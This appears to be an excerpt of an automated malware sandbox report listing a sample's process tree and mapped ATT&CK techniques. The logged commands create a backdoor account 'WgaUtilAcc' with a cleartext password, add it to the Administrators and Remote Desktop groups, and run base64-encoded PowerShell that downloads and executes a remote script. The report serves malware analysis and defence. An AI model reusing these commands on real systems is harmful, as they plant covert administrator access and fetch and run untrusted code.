"C:\Users\Admin\Desktop\CrowdInspect.exe"
1⤵
PID:13432

C:\Users\Admin\Desktop\CrowdInspect64.exe
"C:\Users\Admin\Desktop\CrowdInspect64.exe"
2⤵
PID:7408

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8536

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:11044

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3968

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:11272

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6288

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4444

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:11756

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8988

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
1⤵
PID:9056

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc Ghasar4f5 /del
2⤵
PID:13668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
3⤵
PID:10676

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc GEXL42v7 /add
1⤵
PID:5356

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc GEXL42v7 /add
2⤵
PID:11112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc GEXL42v7 /add
3⤵
PID:11944

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:13044

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:4184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:344

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
1⤵
PID:7164

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
2⤵
PID:8144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
3⤵
PID:7948

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:7688

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:3464

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:12104

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc GEXL42v7
1⤵
PID:892

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc GEXL42v7
2⤵
PID:3752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc GEXL42v7
3⤵
PID:5936

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:8688

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
PID:1020

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:11592

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
PID:11328

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4532

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:10716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Loads dropped DLL
PID:4484

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3160

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Account Manipulation

T1098

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

BITS Jobs

T1197

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

File Permissions Modification

T1222

BITS Jobs

T1197

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery